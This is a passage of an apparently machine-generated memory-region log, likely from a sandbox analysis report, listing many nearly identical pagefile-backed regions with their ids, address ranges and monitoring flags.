0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3382 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3383 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3384 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3385 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3386 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3387 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3388 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3389 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3390 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3391 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3392 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3393 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3394 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3395 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3396 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3397 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3398 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3399 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3400 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3401 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3402 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3403 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3404 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3405 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3406 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3407 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3408 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3409 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3410 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3411 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3412 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3413 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3414 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3415 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3416 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3417 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3418 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3419 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3420 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3421 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3422 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3423 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3424 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3425 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3426 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3427 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3428 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3429 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3430 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3431 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3432 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3433 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3434 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3435 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3436 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3437 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3438 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3439 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3440 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3441 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3442 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3443 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3444 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3445 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3446 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3447 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3448 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3449 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3450 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3451 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3452 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3453 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3454 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3455 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3456 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3457 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3458 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3459 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3460 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3461 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3462 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3463 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3464 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3465 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3466 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3467 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3468 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3469 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3470 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3471 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3472 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3473 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3474 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3475 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3476 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3477 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3478 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3479 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3480 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3481 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3482 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3483 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3484 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3485 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3486 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3487 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3488 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3489 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3490 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3491 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3492 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3493 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3494 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3495 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3496 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3497 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3498 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3499 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3500 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3501 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3502 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3503 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3504 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3505 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3506 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3507 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3508 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3509 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3510 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3511 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3512 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3513 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3514 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3515 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3516 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3517 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3518 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3519 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3520 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3521 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3522 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3523 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3524 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3525 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3526 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3527 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3528 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3529 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3530 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3531 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3532 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3533 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3534 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3535 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3536 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3537 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3538 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3539 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3540 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3541 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3542 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3543 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3544 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3545 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3546 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3547 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3548 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3549 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3550 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3551 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3552 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3553 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3554 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3555 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3556 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3557 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3558 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3559 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 